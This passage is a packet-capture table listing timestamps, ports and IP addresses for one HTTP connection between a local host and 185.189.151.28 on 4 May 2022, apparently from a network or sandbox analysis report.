| May 4, 2022 12:42:53.145473957 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145488024 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145514011 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145530939 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145555019 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145576954 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145593882 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145617008 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145632982 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145653009 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145674944 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145694017 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145711899 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145740032 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145750999 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145770073 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145778894 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145817995 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145839930 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145859003 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145879030 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145898104 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145920038 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145937920 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145956993 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145977974 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146001101 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146015882 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146043062 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146055937 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146083117 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146084070 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146120071 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146122932 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146162987 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146189928 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146202087 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146225929 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146241903 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146256924 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146281004 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146301031 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146318913 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146337032 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146358967 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146374941 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146399021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146416903 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146426916 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146456957 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.146460056 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.146518946 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.250349045 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.267401934 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537480116 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537535906 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537584066 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537662029 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537707090 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537745953 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537763119 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.537797928 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.537803888 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.537846088 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.537852049 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537882090 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.537945986 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.538043022 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.538081884 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.538103104 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.538121939 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.538151026 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.538151026 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.538180113 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.538213968 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.550796032 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.550841093 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.550882101 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.550911903 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551018953 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551063061 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551218987 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551266909 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551330090 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551346064 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551409006 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551418066 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551480055 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551507950 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551520109 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551537991 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551548958 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551573992 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551589012 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551601887 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551630020 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551640987 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551667929 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551687002 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551700115 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551745892 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551765919 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551866055 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551923037 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.551934004 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551974058 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.551987886 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552001953 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552027941 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552059889 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552515984 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552560091 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552593946 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552599907 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552615881 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552628994 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552689075 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552807093 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552848101 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552867889 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552886963 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552902937 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552916050 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.552946091 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.552973986 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564301968 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564347029 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564387083 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564414978 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564579010 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564724922 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564749956 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564769030 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564793110 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564810991 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564831018 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564851046 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564867973 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564888954 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564908028 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564928055 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564949989 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.564958096 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.564985037 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565025091 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565161943 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565200090 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565218925 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565252066 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565263987 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565321922 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565327883 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565361977 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565380096 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565402985 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565427065 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565440893 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565468073 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565480947 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565495968 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565543890 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565876961 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.565943956 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.565944910 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566000938 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566061974 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566103935 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566113949 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566144943 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566160917 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566184998 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566199064 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566212893 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566236973 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566294909 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566464901 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566505909 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566525936 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566544056 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566559076 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566571951 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566598892 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566632032 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566761971 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566801071 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566819906 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566840887 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566860914 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566912889 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566916943 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566956043 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.566975117 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.566996098 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567012072 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567042112 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567070007 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567070007 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567107916 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567128897 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567152023 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567190886 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567213058 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567231894 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567246914 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567260981 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.567289114 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567316055 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.567980051 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568022966 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568061113 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568072081 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.568100929 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568125010 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.568145037 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568156004 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.568182945 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568200111 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.568212986 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.568257093 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.568285942 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.569245100 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.569287062 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.569327116 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.569331884 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.569355965 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.569367886 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.569395065 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.569423914 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.577828884 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.577925920 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.577924013 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.577965021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.577977896 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.578003883 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.578035116 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.578037977 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.578053951 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.578074932 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.578098059 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.578103065 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.578138113 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.578150988 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579251051 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579289913 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579324961 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579332113 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579349995 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579361916 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579379082 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579400063 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579415083 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579457045 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579507113 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579540968 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579590082 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579597950 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579632998 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579647064 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579669952 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579700947 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579708099 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579715967 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579742908 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579757929 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579780102 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579793930 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579807043 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.579849958 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.579863071 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.580857038 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.580895901 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.580931902 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.580941916 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.580969095 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.580974102 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.580985069 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581006050 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581018925 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581043005 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581056118 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581069946 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581100941 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581113100 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
